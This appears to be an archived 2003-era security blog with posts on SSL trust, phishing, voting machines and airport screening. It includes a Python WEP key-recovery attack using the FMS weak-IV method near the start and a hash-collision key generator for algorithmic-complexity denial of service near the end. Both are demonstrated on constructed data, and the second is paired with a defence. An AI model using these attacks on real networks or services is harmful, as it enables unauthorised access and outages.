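    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    return S


def rc4_first_byte(key: bytes) -> int:
    """First PRGA output byte: i = 1, j = S[1], swap, emit S[S[i] + S[j]]."""
    S = rc4_ksa(key)
    i, j = 1, S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) % 256]


def wep_first_cipher_byte(iv: bytes, secret: bytes) -> int:
    """What a sniffer sees: WEP's per-packet key is IV || secret, and the IV travels in clear."""
    return rc4_first_byte(iv + secret) ^ SNAP_FIRST_BYTE


def weak_ivs(a: int):
    """FMS IVs of the form (a+3, 255, x) leak secret byte number a."""
    return [bytes((a + 3, 255, x)) for x in range(256)]


def rank_candidates(prefix: bytes, samples, top: int = 3):
    """Vote for secret byte len(prefix) given the already-recovered prefix."""
    a = len(prefix)
    votes = Counter()
    for iv, c0 in samples:
        z = c0 ^ SNAP_FIRST_BYTE           # first keystream byte, since the plaintext byte is known
        k = list(iv) + list(prefix)
        S, j = list(range(256)), 0
        for i in range(a + 3):             # replay the KSA through the key bytes we know
            j = (j + S[i] + k[i]) % 256
            S[i], S[j] = S[j], S[i]
        if S[1] >= a + 3 or (S[1] + S[S[1]]) % 256 != a + 3:
            continue                       # not in the "resolved" state: no information
        # With probability ~5% the first output byte is S[a+3] after the next KSA step,
        # i.e. the value sitting at index j_next right now, so j_next = S.index(z).
        votes[(S.index(z) - j - S[a + 3]) % 256] += 1
    return [byte for byte, _ in votes.most_common(top)]


def recover_key(samples_by_byte, key_len: int, check, prefix: bytes = b""):
    """Depth-first over the top candidates; a full key is accepted only if it reproduces the captures."""
    if len(prefix) == key_len:
        ok = all(wep_first_cipher_byte(iv, prefix) == c0 for iv, c0 in check)
        return prefix if ok else None
    for cand in rank_candidates(prefix, samples_by_byte[len(prefix)]):
        found = recover_key(samples_by_byte, key_len, check, prefix + bytes([cand]))
        if found is not None:
            return found
    return None


def capture(secret: bytes):
    """Constructed capture: each weak IV seen once per key byte (a real sniffer has to wait for them)."""
    return [[(iv, wep_first_cipher_byte(iv, secret)) for iv in weak_ivs(a)] for a in range(len(secret))]


def demo(secret: bytes = bytes.fromhex("5a139d2271")) -> bytes:
    """Recover a 40-bit key from the constructed capture; the attacker side never reads `secret`."""
    samples = capture(secret)
    return recover_key(samples, len(secret), samples[0][:8])


if __name__ == "__main__":
    print(demo().hex())
```

Real attacks need far more packets because only a small fraction of IVs are weak, which is exactly why tricks that make the AP transmit more encrypted packets speed things up so much. The depth-first verification step is what keeps the recovery robust when a wrong byte happens to collect more votes than the right one.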

digg this!| | Comments (0) | TrackBacks (0)

Security no match for theater lovers

This article shows that for the promise of a $7-$10 movie ticket, you can trivially gather enough information about almost anyone to steal their identity. And this was at a security conference. I've seen a couple of other studies such as this with other low-value enticements work just as effectively.

digg this!| | Comments (0) | TrackBacks (0)

Web Security Group Launches Northwest Chapter

The leading web application security organization, Open Web Application Security Project (OWASP), has opened a local chapter in Seattle.

I may be spending some time with this group. Glad to see more volunteer security orgs in the Seattle area! And glad to see some emphasis on application security, of course.

Their website is http://www.owasp.org/local/seattle.html

Be warned: the site looks atrocious in Firefox.

digg this!| | Comments (0) | TrackBacks (0)

ICANN Email Archives: [net-rfp-verisign]

See also http://www.financialcryptography.com/mt/archives/000332.html

...Verisign also operates a 'Lawful Intercept' service called
NetDiscovery [2]. This service is provided to "... [assist]
government agencies with lawful interception and subpoena requests
for subscriber records [3]."

We believe that under such a service, VeriSign could be required
to issue false certificates, ones _unauthorised_ by the nominal
owner. Such certificates could be employed in an attack on the
user's traffic via the DNS services now under question. Further,
the design of the SSL browser system includes a 'root list' of
trusted issuers, and a breach of _any_ of these means that the
protection afforded by SSL can now be bypassed.

.....

The cryptographers and security architects who designed the SSL system in 1994 and 1995 envisaged the issuer of certificates to be _trusted by the certificate owner_. This development represents the antithesis of this security requirement.

digg this!| | Comments (0) | TrackBacks (0)

ActForChange Petition: Stop the Florida-tion of the 2004 election

"Today, there is a new and real threat to voters, this time coming from touchscreen voting machines with no paper trails and the computerized purges of voter rolls.

Urge your friends to join SCLC President Martin Luther King III and investigative reporter Greg Palast in opposing the "Florida-tion of the 2004 Presidential election" by signing this petition."

digg this!| | TrackBacks (0)

Interesting paper on how to use memory errors to attack a virtual machine. The attack exploits the fact that a "time of compilation" check is not necessarily valid at "time of use."

This happens to be the theory behind the Java ByteCode verifier. I just heard Whit Diffie talk yesterday at SecureWorld Expo about how the run-time check of the bytecode is intended to validate that proper array bounds checking is going to be done, for example.

digg this!| | TrackBacks (0)

Monthly reports on security and non-security-related items, such as analysis of SSL web server usage and Apache module usage. Very interesting. I like to see Apache having almost 80% of the market share now :-)

SecuritySpace

digg this!| | TrackBacks (0)

"99% of SSL users have no idea how SSL works and consequently can't make informed decisions"

Browser manufacturers try to make things easy for users but end up diluting the security properties of the hierarchical trust model.

A lot of talk in recent years on the cryptography mailing list indicates that this model is too broken and perhaps should be replaced with an ad-hoc mechanism, such as the SSH model, with all web servers installing _some_ sort of certificate by default--even self-signed. The thoughts are that some confidentiality protection with reasonable MITM detection is better than so few sites supporting encryption since they don't want to pay Verisign blood money for a "real" certificate.

You'll notice on my site that I have always used my own cert. I should probably regenerate one that is not expired...

-----Original Message----- From: InfoSec News [mailto:isn@c4i.org] Sent: Monday, March 24, 2003 12:39 AM To: isn@attrition.org Subject: Re: [ISN] Is SSL safe?

Forwarded from: Kurt Seifried

None of this really matters because 99% of SSL users have no idea how
SSL works and consequently can't make informed decisions when faced
with attacks such as:

1) Older SSL clients that don't check certificate constraints, i.e.
CAN-2002-0828, CAN-2002-0862, CAN-2002-0970, CAN-2002-1183,
CAN-2002-1407 and so on. If you don't understand what this sentence
means you are potentially vulnerable. I have yet to see a GOOD plain
english description of this problem that my mother would understand.

2) Verifying certificates that are out of date or issued to the wrong
common name (i.e. hostname). This happens a lot, my web based banking
provider (one of the big 4 banks in Canada) used an out of date SSL
certificate for about a week last year. Perhaps an insider attack at
work, perhaps an innocent mistake, I never got an answer out of them.

3) Verifying that certificates are issued from a trusted provider.
Most common web based SSL clients (like Netscape, IE) have over 100
root certificates. Have you ever heard of "Certisign Certificadora
Digital Ltda." (doesn't expire until 2018) or "IPS SERVIDORES" (good
until 2009). It seems to me that an intelligent criminal could subvert
one of these small firms (hostile takeover, get employed there, etc.)
and then have a grand old time issuing certificates to themselves.

4) The eternal "who cares about SSL" argument, web servers and back
end infrastructure is so poorly secured that most times an attacker
can spend a week breaking in and get a few (tens, hundreds, etc.) of
thousands of credit cards with all the personal data in one fell
swoop. This applies less so against "secure" corporate/gov/mil/etc
infrastructure like SSL encrypted POP email, against which targeted
SSL attacks are useful (to gain a password to gain further access,
etc.).

5) All the old old stuff I covered in:

http://seifried.org/security/cryptography/20011108-end-of-ssl-ssh.html

and

http://seifried.org/security/cryptography/20011108-sslssh-followup.html

Which still largely applies. *SIGH*.

Kurt Seifried, kurt@seifried.org
A15B BEE5 B391 B9AD B0EF
AEB0 AD63 0B4E AD56 E574
http://seifried.org/security/

digg this!| | TrackBacks (0)

A great (old) post to Risks 22.74 about the past issues with designing solutions to buffer overflows in hardware. Also, a link to a paper describing the history of these efforts that I'll be looking to check out.

Crispin was just spotted at SecureWorld Expo in Seattle today...

-Jason

----------------
Date: Sat, 10 May 2003 19:19:12 -0700
From: Crispin Cowan
Subject: Re: OpenBSD ... protects against buffer-overflow ... (Ardley, R 22.72)

>What is not so apparent is why technology that was developed and
>operating over 30 years ago is just being re-invented in software.

Because what was developed in operating systems over 30 years ago was
use of heavily segmented architectures. Over 20 years ago (the Intel
432) it was discovered (the hard way) that such architectures run
horribly slowly compared to RISC architectures. Since the debacle of the
432, even CISC processors such as the x86 have migrated towards RISC
style instruction processing.

What OpenBSD is implementing is a variety of software schemes to make up
for the lack of hardware protection for array bounds. Some of these
schemes (Openwall's non-executable stack) are performance neutral: just
mark the stack segment non-executable. Some (ProPolice, a
re-implementation of StackGuard) are very cheap, much cheaper than
enforcing memory safety in hardware.

Unfortunately, one of these enhancements (W^X) is not so cheap. Here,
they try to make all writable pages non-executable, and vice versa. This
is problematic on the x86 architecture because waaaay back in the day,
Intel decided that memory pages did not need separate Read and Execute
permission bits in the TLB (only segments have separate R and X bits,
not pages). The W^X hack has to do a lot of work with TLB faults to
compensate for this simple omission.

>The Burroughs 6700 implemented a hardware solution to the problem by
>assigning 3 bits of every 51 bit memory location to the type of data
>contained.

The 432 did something similar, and the performance penalty was
astronomical. For a survey of buffer overflow attacks and defenses,
check out these papers:

"Buffer Overflows: Attacks and Defenses for the Vulnerability of
the Decade". Crispin Cowan, Perry Wagle, Calton Pu, Steve Beattie,
and Jonathan Walpole. DARPA Information Survivability Conference and
Expo (DISCEX) http://schafercorp-ballston.com/discex/, Hilton Head
Island SC, January 2000. Also presented as an invited talk at SANS
2000 http://www.sans.org/sans2000/sans2000.htm, Orlando FL, March
2000. PDF http://immunix.com/%7Ecrispin/discex00.pdf.

"Software Security for Open Source Systems". Crispin Cowan. IEEE
Security & Privacy Magazine http://www.computer.org/security/,
February 2003, Volume 1, Number 1
http://www.computer.org/security/sp2003/j1toc.htm?SMSESSION=NO,
pages 35-48. PDF
http://wirex.com/%7Ecrispin/opensource_security_survey.pdf.

Crispin Cowan, Ph.D., Chief Scientist, Immunix http://immunix.com
http://immunix.com/~crispin/ http://www.immunix.com/shop/

digg this!| | TrackBacks (0)

I still run into people who believe that PKI is a viable end-user authentication solution for the masses. My favorites were the systems that tried to solve the certificate portability problem by allowing download of certs from a website -- protected only by a password! The vendor couldn't see that this was no more secure than the password itself. Another case of "But this one goes to 11".

-J

PKI 'not working'

The e-envoy's office has started searching for new ways to authenticate the users of e-services as existing technology is "not working", a senior UK Government official revealed on 11 June 2003.

Although PKI (public key infrastructure) and digital certificate technology has played a major role in leading projects such as the Government Gateway, there is now growing recognition that it is unsuited for wider public use.

While digital certificates would not be scrapped, and would be retained as an option for e-service users, one possible alternative being suggested is that employers, banks, the voluntary sector and other "trusted organisations" would verify a person's identity before transacting online for services.

digg this!| | Comments (0) | TrackBacks (0)

And now candidates are crying "security" to win elections... It works on both sides apparently.

-J

WSJ.com - Companies Cry 'Security' to Get A Break From the Government

In Kansas, utilities want to raise rates without having to tell their customers why. Elsewhere, grocers and mall owners seek tax breaks for equipment purchases. And at sports arenas, teams want to keep banner-trailing planes away from their stadiums.

Sept. 11 to the rescue.

Across America, special-interest groups are using the threat of terrorism to help them get what they want from elected officials. In framing their requests as being in the interests of national security, these groups are benefiting from lawmakers' fear of another terrorist attack in the U.S.

digg this!| | Comments (0) | TrackBacks (0)

Catching up on draft postings, this is one that is very timely today, although it was originally penned over a year ago.

-J

Message: 6 Date: Sat, 20 Sep 2003 14:26:14 -0800 From: "Rob, grandpa of Ryan, Trevor, Devon & Hannah" Subject: Cost/benefit

In commenting on yet another pointless "homeland security" proposal, the
INFOCON mailing list passed along this quote:

"The number one threat to American national security during this long
war is neither anthrax nor truck bombs... it is uncontrolled spending. We
cannot afford to put guards on every bridge and at every critical node
of our infrastructure. We cannot afford a sophisticated chemical and
biodetector in every government building. America cannot afford a
risk-free society in a world of global terrorism. The enemy's strategy
is to destroy our economy. We must not facilitate their efforts. America
will need to spend considerable sums of money to ensure our security...
but we must do it wisely... there will be no money to waste on irrational
fear and unconscionable pork. We must develop a strategic plan to guide
our efforts. This must include federal, state and local governments,
plus the private sector. Since 9-11, more than 130 bills regarding
homeland security have been introduced in the House of Representatives.
This is not the example of spending based on a strategic plan.

"The outcome of this war will determine the type of nation our
grandchild will know. I do not want that to be a nation that is
bankrupt."

Randall Larsen, Director, ANSER Institute for Homeland Security, at the
National Defense University Symposium on Quadrennial Defense Review 2001



digg this!| | Comments (0) | TrackBacks (0)

I recently got a ReplayTV 5040 for a steal on closeout at buy.com and just love it. One of the most attractive features is how it is network-aware by default and that the community has created some great free software for integrating with it. I have been using DVArchive to expand the capacity for recording without having to violate my ReplayTV warranty by hacking the hardware. DVArchive enables your PC to act as a software-based ReplayTV unit for replay, archival, vending photos, as well as playing recorded mpegs remotely on your PC.

However, I was horrified at the suggestion in the DVArchive FAQ that on UNIX "you must launch DVArchive as root" if you want to enable the functionality that allows serving shows back to your ReplayTV, or to other DVArchive programs running on your network. The real reason for this is that DVArchive (due to inflexible ReplayTV design) must bind to port 80 for ReplayTV units to access the HTTP server there that vends out the mpeg files. And to do this, you normally have to be root.

Well, you could just use sudo or worse, log in as root and run DVArchive as root. But, being a security person, this was not a pleasing thought.

So, I came up with a better way that runs DVArchive as an unprivileged user on the system. I do this by using port forwarding to forward connections to port 80 up to an alternate, unprivileged high port.

Fortunately, DVArchive allows you to specify a different TCP port to listen to instead of port 80. Now, it will bark at you that what you are doing is probably going to prevent ReplayTV units from accessing files on your DVArchive server but you can safely ignore these because you've got port forwarding up your sleeve.

1) Set that port to some open high TCP port under File -> DVArchive Properties... -> Server by changing the "Server Port" setting. I used 13198 in this example and in the attached startup script.

2) Install the attached startup script (see the Extended Entry text for the full script) as root to /etc/rc.d/init.d/dvarchiveforward

3) Edit dvarchiveforward and change MYIP to point to your IP address of your DVArchive server and change the IPTABLES binary location, if necessary.

4) On a RedHat 7.x - 9 system (or any other that has chkconfig) you can activate this script at boot time by running (still as root):
/sbin/chkconfig --add dvarchiveforward

5) You can then check to make sure that this script was activated by running:
/sbin/chkconfig --list dvarchiveforward
You should see output like:

dvarchiveforward 0:off 1:off 2:on 3:on 4:on 5:on 6:off

6) Now, start this script so you don't have to wait for a reboot for it to work:

/sbin/service dvarchiveforward start

7) Check to see that the port forwarding entries were inserted correctly

/sbin/iptables -t nat -L

Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere yourhostname tcp dpt:http to:192.168.1.1:13198

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere yourhostname tcp dpt:http to:192.168.1.1:13198

8) Now, you can try accessing archived shows on your DVArchive server from your ReplayTV. All should work just fine.
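Since the attached startup script itself is not reproduced on this page, here is an added stand-in of my own (not the script from the Extended Entry) that does the same job end to end: it generates the two DNAT rules that the listing in step 7 shows, applies or removes them, and automates step 7 by checking an `iptables -t nat -L` listing for both chains. The address 192.168.1.1, port 13198, the iptables path and the chkconfig runlevels follow the steps above; the sample listing is copied from step 7 and everything else is an assumption of the example.

```python
#!/usr/bin/python
# dvarchiveforward -- DNAT port 80 on the DVArchive host to its unprivileged port.
# Added example standing in for the attached script; not the script from the Extended Entry.
#
# chkconfig: 2345 90 10
# description: forward TCP/80 to the DVArchive server port so DVArchive can run unprivileged
import re
import subprocess
import sys

IPTABLES = "/sbin/iptables"   # change if your iptables lives elsewhere
MYIP = "192.168.1.1"          # the DVArchive host's own address, as in the listing in step 7
DVPORT = 13198                # the "Server Port" set in DVArchive Properties -> Server

# Constructed sample of `iptables -t nat -L` output, copied from step 7, used for the self-check.
SAMPLE_LISTING = """\
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere yourhostname tcp dpt:http to:192.168.1.1:13198

Chain POSTROUTING (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination
DNAT tcp -- anywhere yourhostname tcp dpt:http to:192.168.1.1:13198
"""


def dnat_rules(myip: str, port: int, action: str = "-A"):
    """Both DNAT rules as argv lists. PREROUTING rewrites packets arriving from the ReplayTV;
    OUTPUT rewrites connections the DVArchive host makes to its own port 80. Pass "-D" to delete."""
    return [
        [IPTABLES, "-t", "nat", action, chain, "-p", "tcp", "-d", myip, "--dport", "80",
         "-j", "DNAT", "--to-destination", "%s:%d" % (myip, port)]
        for chain in ("PREROUTING", "OUTPUT")
    ]


def apply_rules(rules, run=subprocess.run):
    """Run each rule; `run` is injectable so the commands can be inspected without being root."""
    for argv in rules:
        run(argv, check=True)


def forwarding_present(listing: str, myip: str, port: int) -> bool:
    """Step 7's check, automated: both PREROUTING and OUTPUT must carry the DNAT rule."""
    target = "to:%s:%d" % (myip, port)
    chain, found = None, set()
    for line in listing.splitlines():
        m = re.match(r"Chain (\S+)", line)
        if m:
            chain = m.group(1)
        elif chain and line.startswith("DNAT") and "dpt:http" in line and line.rstrip().endswith(target):
            found.add(chain)
    return {"PREROUTING", "OUTPUT"} <= found


if __name__ == "__main__":
    cmd = sys.argv[1] if len(sys.argv) > 1 else "status"
    if cmd == "start":
        apply_rules(dnat_rules(MYIP, DVPORT, "-A"))
    elif cmd == "stop":
        apply_rules(dnat_rules(MYIP, DVPORT, "-D"))
    elif cmd == "status":
        listing = subprocess.run([IPTABLES, "-t", "nat", "-L"], capture_output=True, text=True, check=True).stdout
        print("forwarding active" if forwarding_present(listing, MYIP, DVPORT) else "forwarding NOT active")
    else:
        sys.exit("usage: %s start|stop|status" % sys.argv[0])
```

Note that the rules only match traffic addressed to MYIP, so nothing else on the box is redirected, and the DVArchive process itself still never needs to be root: the only privileged operation is installing the NAT rules at boot.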

digg this!| | Comments (5) | TrackBacks (0)

Within the past month or so, I received a warning from Sony about fraudulent e-mails claiming to be from Sony but that actually were not. The deceptive e-mails were designed to lure Sony customers into divulging personal information at a fake Sony site. It "falsely indicates that it is from SonyStyle.com" and "includes a link to a bogus SonyStyle.com registration site"

So, I was shocked to notice that the e-mail from Sony that was supposedly warning about deceptive e-mails and URLs was itself guilty of using apparently deceptive or "fraudulent" URLs!

Within the text, it contained a couple of URLs that, in the HTML version of the e-mail, deceptively show up as www.sonystyle.com, but in fact pointed to some other site at m0.net. Here is one of the deceptive URLs from Sony:

http://news.sonystyle.m0.net/m/S.asp?HB9483736521X2571692X218821X

Not to mention that the From address of the e-mail was also from the same site: sonystyle@news.sonystyle.m0.net

Should you trust the warning e-mail? Sure. The contents are benign enough. Just think twice about clicking those links or replying to the e-mail! Sony is surely using a company to send out the mass e-mailings and to track the "click-through" responses, but that seems like a pretty poor choice in this context!

digg this!| | Comments (0) | TrackBacks (0)

Here is an excerpt from an e-mail I got today. If you ever get e-mail purportedly from a company that asks you to divulge personal information, there is a high likelihood that it is one of the many social engineering attacks running around. Popular ones try to snag AOL and eBay/PayPal users. Be wary of which e-mails and Internet sites you trust your personal information to!!

IMPORTANT: E-MAIL HOAX NOTIFICATION

Late Wednesday afternoon, June 18, 2003, Best Buy became aware of an unauthorized and deceptive e-mail to consumers titled "Fraud Alert." That e-mail message, which requested personal information (i.e., social security and credit card numbers), claimed to come from the BestBuy.com Fraud Department. That message was NOT from Best Buy or any of our affiliates.

Best Buy is working with the appropriate law enforcement authorities to quickly resolve the situation. We are working to shut down sites affiliated with that unauthorized e-mail and Best Buy will work with law enforcement authorities to prosecute any perpetrators involved in this illegal act to the fullest extent of the law. If you replied to the fraudulent e-mail in any way, contact your bank and/or credit card companies immediately.

No Best Buy systems have been compromised, and our online business is secure. The privacy of your personal information is of the utmost importance to Best Buy and any information you provide to us is handled according to our Privacy Policy.

digg this!| | Comments (0) | TrackBacks (0)
  1. Confidential bug report gets sent to CERT.
  2. CERT sends it out to their advanced ISA (Internet Security Alliance: pay for early warning) group (which Jericho calls "a vulnerability cartel")
  3. The bug report is leaked out to the public, perhaps by an ISA member who was either compromised (if so, they would need more than CERT to help them...) or purposefully leaked it out

Jericho's comments on the ISN list were classic, especially:

"> CERT representatives declined to say when the organization planned
> to release official versions of the leaked advisories.

Even with leaked draft copies, CERT still can't release anything
on time. Go figure."

Wired News: Leaked Bug Alerts Cause a Stir

digg this!| | TrackBacks (0)

John Gilmore points out how to have fun with bomb scanners by using hand lotion containing glycerine, or at least points out how easily such expensive equipment can be rendered useless. If equipment produces any significant number of false positives, rest assured that it, or the procedures around it, will be tuned to the point of eliminating any hope of finding the real needle in the haystack.

Also, if you notice an "S" on your boarding pass, prepare for extra scrutiny at the airport. The TSA believes, based on often erroneous matching, that you are a member of its "Selectee" list of people who need additional security measures.

Be sure to check out EPIC's site, "Documents Show Errors in TSA's "No-Fly" Watchlist"

-----Original Message-----
From: John Gilmore [mailto:gnu@toad.com]
Sent: Sunday, May 18, 2003 3:25 PM
To: Jason C Axley Exchange
Subject: Re: The War on David Nelson

> > ... people who want to see if their name is on either list or who
> > want to make a complaint, can call the agency's contact center at
> > 866-289-9673 or send an e-mail to TellTSA@tsa.dot.gov.
>
> Since this inquiry will no doubt result in a listing where none previously
> existed, I would suggest that everyone reading this make an inquiry -
> *especially* those of us with very common names. Let the system break under
> its own weight.

If you want to break the system under its own weight, I also suggest
using lots of "Kiss My Face" honey scented hand cream. Someone
recently told me about setting off the nitroglycerin censors (oops, I mean
sensors) at that spot where they wipe down your bag with little pads
and then put them through a quick chemical analysis. When she set it
off, they went down a checklist of "Did you do X recently?" until they
got to "Did you put on hand cream recently?" They let her through, of
course; you probably can't blow up an airplane with hand cream. The
problem was with their sensorship, not with her.

If even 1% of travelers refused to show an ID, the system would also
break down under its own weight. Do your part. There is no law or
regulation that requires you to show ID. You are all being sheep for
violating your own privacy, for no reason, when ordered by people who
have no authority. Demand that they show you such a law, and refuse
to show ID until they identify one. As you go up the chain of
command, you will find that you have the option to be searched rather
than show an ID. In regimes where the laws are secret, the only way
to find out what the law is, is to not follow orders.

John

PS: I doubt that sending a complaint to TSA results in them adding you
to the no-fly list. It's random and arbitrary, but not THAT random
and arbitrary. If you want to see the complaints of some of the
ordinary people who TSA mousetraps every single time they enter an
airport, (not just the David Nelsons), check EPIC's FOIA results. The
dozens of complaints forwarded via Congresspeople are well worth
reading:


http://www.plastic.com/article.html;sid=03/03/12/06265215;cmt=42

---------------------------------------------------------------------
The Cryptography Mailing List
Unsubscribe by sending "unsubscribe cryptography" to
majordomo@metzdowd.com

digg this!| | TrackBacks (0)

How do you measure a cost-benefit for the new security measures or of your liberty? It is hard to even come up with a causal link from the "increased" security measures (ask me about the absurd experience I had in LAX...) to increased safety, let alone quantifying such a benefit.

There is also a discussion at http://www.plastic.com/article.html;sid=03/03/12/06265215;cmt=42

NYTimes.com Abstract

In an unusual twist on cost-benefit analysis, an economic tool that conservatives have often used to attack environmental regulation, top advisers to President Bush want to weigh the benefits of tighter domestic security against the ''costs'' of lost privacy and freedom.

digg this!| | TrackBacks (0)

David Wheeler has put together a set of design and implementation guidelines for programming securely in several languages. The document is actually in a ton of different formats, even ones suitable for Wireless devices. So, take yours with you and learn it well!

Secure Programming for Linux and Unix HOWTO

There is also a set of overview slides that are definitely worth a look.

digg this!| | TrackBacks (0)

I love the quote below and the 15 claims about how shady the Antivirus industry is are great, especially #7, "expect applause when you release hundreds of security patches for your product each year;"

Vmyths.com- Truth About Computer Virus Myths & Hoaxes

"The Pentagon should not protect a weapon system with software written by people they'd never trust. Yet they do."

digg this!| | TrackBacks (0)

Interesting work, and something I can't seem to get many people to pay attention to. Not all DoS attacks are bandwidth exhaustion attacks. DoS attacks can be thought of generically as resource exhaustion or suppression attacks, and that does not necessarily require a large amount of bandwidth.

Conventional thinking about DoS leads people to believe that the normal ways of monitoring systems will catch an attack early, simply because such brazen resource consumption would be hard to miss. A low-flying attack, however, can pin the CPU with a trickle of carefully chosen requests, and that is much harder to detect without finer-grained application-level monitoring (per-request CPU time, hash chain lengths, queue depths) than is usually deployed.

This work documents attacks on the algorithmic complexity of applications themselves to cause DoS.

Denial of Service via Algorithmic Complexity Attacks

We present a new class of low-bandwidth denial of service attacks that exploit algorithmic deficiencies in many common applications' data structures. Frequently used data structures have "average-case" expected running time that's far more efficient than the worst case. For example, both binary trees and hash tables can degenerate to linked lists with carefully chosen input. We show how an attacker can effectively compute such input, and we demonstrate attacks against the hash table implementations in two versions of Perl, the Squid web proxy, and the Bro intrusion detection system. Using bandwidth less than a typical dialup modem, we can bring a dedicated Bro server to its knees; after six minutes of carefully chosen packets, our Bro server was dropping as much as 71% of its traffic and consuming all of its CPU. We show how modern universal hashing techniques can yield performance comparable to commonplace hash functions while being provably secure against these attacks.
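As an added illustration (my own example code, not from the paper or from any of the attacked projects), here is the attack in miniature: a djb2-style multiplicative string hash of the kind the paper targets, a generator that produces 2^n distinct keys which all hash to the same value, a chained hash table that counts key comparisons as a proxy for CPU time, and the fix the paper recommends, a hash keyed with a per-process secret (BLAKE2b's keyed mode stands in for universal hashing here). The bucket count, key sizes and block bytes are arbitrary choices for the demonstration.

```python
import hashlib
import os
from itertools import product

# Two 2-byte blocks that advance a "h = h*33 + byte" hash by exactly the same amount:
# 33*ord('a') + ord('z') == 33*ord('b') + ord('Y') == 3323.  A string built from these
# blocks therefore hashes to the same value as every other string with the same number
# of blocks, so 2**n colliding keys cost the attacker nothing to produce.
COLLIDING_BLOCKS = (b"az", b"bY")


def weak_hash(key: bytes) -> int:
    """Unkeyed multiplicative string hash (djb2 style), the kind the paper targets."""
    h = 5381
    for c in key:
        h = (h * 33 + c) & 0xFFFFFFFF
    return h


def make_colliding_keys(n_blocks: int) -> list:
    """Return 2**n_blocks distinct keys that all share one weak_hash value."""
    return [b"".join(choice) for choice in product(COLLIDING_BLOCKS, repeat=n_blocks)]


def keyed_hash_factory(secret: bytes = None):
    """Build a hash keyed with a per-process secret.  BLAKE2b keyed mode is used here;
    universal hashing or SipHash is the same idea.  Without the secret an attacker
    cannot precompute inputs that collide."""
    secret = secret if secret is not None else os.urandom(16)

    def keyed_hash(key: bytes) -> int:
        digest = hashlib.blake2b(key, digest_size=4, key=secret).digest()
        return int.from_bytes(digest, "big")

    return keyed_hash


class ChainedHashTable:
    """Minimal separate-chaining table that counts key comparisons as a CPU-cost proxy."""

    def __init__(self, hash_fn, nbuckets: int = 1024):
        self.hash_fn = hash_fn
        self.buckets = [[] for _ in range(nbuckets)]
        self.probes = 0

    def insert(self, key: bytes, value) -> None:
        chain = self.buckets[self.hash_fn(key) % len(self.buckets)]
        for i, (k, _) in enumerate(chain):
            self.probes += 1          # one comparison per existing entry walked
            if k == key:
                chain[i] = (key, value)
                return
        chain.append((key, value))


def insertion_cost(hash_fn, keys, nbuckets: int = 1024) -> int:
    """Total key comparisons needed to insert `keys`; quadratic when they all collide."""
    table = ChainedHashTable(hash_fn, nbuckets)
    for k in keys:
        table.insert(k, True)
    return table.probes


if __name__ == "__main__":
    n = 11
    hostile = make_colliding_keys(n)                           # 2048 keys, one bucket
    benign = [os.urandom(2 * n) for _ in range(len(hostile))]  # same count, random keys
    print("distinct weak_hash values over hostile keys:", len({weak_hash(k) for k in hostile}))
    print("comparisons, benign keys, weak hash:  ", insertion_cost(weak_hash, benign))
    print("comparisons, hostile keys, weak hash: ", insertion_cost(weak_hash, hostile))
    print("comparisons, hostile keys, keyed hash:", insertion_cost(keyed_hash_factory(), hostile))
```

Running it shows the hostile keys costing n(n-1)/2 comparisons (2,096,128 for 2,048 keys) under the weak hash, against a few thousand for the very same keys under the keyed hash. The keyed hash does not make the table faster on normal input; it only takes away the attacker's ability to compute collisions offline, which is exactly the property the paper's universal hashing provides.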


This scares me as a security professional. This especially scares me as a resident of Washington State.

Some gems from this interview with representatives from Sequoia systems:

Miller: "On the touch screen -- we do have the hand recounts of close races too."

Harris: "On a machine with no voter-verified paper trail?"

Miller: "Well, there's no way to do a hand recount on a DRE."

-------------

Harris: "But the positive, which can be proved, is that every election system that's ever been used in the USA has, at one time or another, been tampered with. And what we do know is that $800 million has gone toward contributions to candidates. So certainly we can predict that someone will try to tamper with a programmer. And therefore, what I'm asking, is what safeguards do we have in place to make sure that, if someone tampers with a program or a CD update --"

Miller: "I think we've gone as far as we can go."

Black Box Voting: Ballot - Tampering in the 21st Century - Interview with Paul Miller & Kathryn Ferguson (Sequoia)


A post to the IP and Risks lists is a harbinger of things to come as more and more complexity and computer control gets added to everyday devices without the kind of quality and safety engineering that the mechanical systems they replace received. We can only hope that Ford and other car companies will not be successful in overturning laws requiring mechanical connections for safety-critical systems like steering, braking, etc.

-core24

Date: Tue, 13 May 2003 17:31:11 -0700
From: "Robert J. Berger"
Subject: MS Windows crash traps Thai politician in car (From Dave Farber's IP)

Crashed Computer Traps Thai Politician, 14 May 2003
http://aardvark.co.nz/daily/2003/n051301.shtml

Thailand's Finance Minister Suchart Jaovisidha had to be rescued today from inside his expensive BMW limousine after the onboard computer crashed, leaving the vehicle immobilized.

Once the computer failed, neither the door locks, power windows nor air
conditioning systems would function, leaving the Minister and his driver
trapped inside the rapidly heating vehicle.

Despite the pair's best efforts, it took a full ten minutes before they were able to summon the attention of a nearby guard who freed the two men by smashing one of the vehicle's windows with a sledgehammer.

A report (http://www.bangkokpost.com/Business/13May2003_biz12.html)
published in the *Bangkok Post* indicates that the vehicle was Mr
Jaovisidha's own BMW 520 which was being used while his state-supplied
Mercedes, was being repaired.

BMW's more up-market 7-series range uses a computer system called i-drive which has Microsoft's WindowsCE at its core.
http://www.microsoft.com/presspass/press/2002/Mar02/03-04BMWpr.asp

Did Mr Jaovisidha narrowly miss being killed by the blue windscreen of
death?

Robert J. Berger - Internet Bandwidth Development, LLC.
Voice: 408-882-4755 eFax: +1-408-490-2868
http://www.ibd.com

IP Archives at:
http://www.interesting-people.org/archives/interesting-people/

[At least 33 readers have noted this one thus far. TNX! PGN]


A couple more sites working against all-electronic voting machines:

http://www.blackboxvoting.com/
http://www.ecotalk.org/VotingSecurity.htm

Also, an article discussing a situation that, if true, is truly egregious:

The senator who won the election in Nebraska allegedly "was the head of, and continues to own part interest in, the company that owns the company that installed, programmed, and largely ran the voting machines that were used by most of the citizens of Nebraska."

The bigger issue, in my opinion, is not whether the senator had rigged his election but the fact that we are entirely unable to verify whether this occurred or not. With a voter verifiable and recountable audit trail, we could.


I sure hope so. I have high expectations for Windows 2003. We'll see how things progress.

I want to know who the companies are that were surveyed... I assure you mine wasn't one of them.

